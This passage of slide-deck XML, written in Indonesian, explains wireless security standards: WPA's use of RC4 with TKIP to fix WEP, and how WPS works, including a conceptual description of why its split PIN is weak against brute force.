              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergabung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasosiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi Protected Access (WPA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (WEP) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WEP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> stream cipher RC4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Temporal Key Integrity Protocol (TKIP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Wi-Fi Protected Setup (WPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perumahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi Protected Setup (WPS). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tombol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengaktifkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan adaptor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PIN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> adaptor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSID dan PSK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>acak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tombol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, PIN (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tercetak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada WAP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sayangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, WPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>delapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> checksum dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>empat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
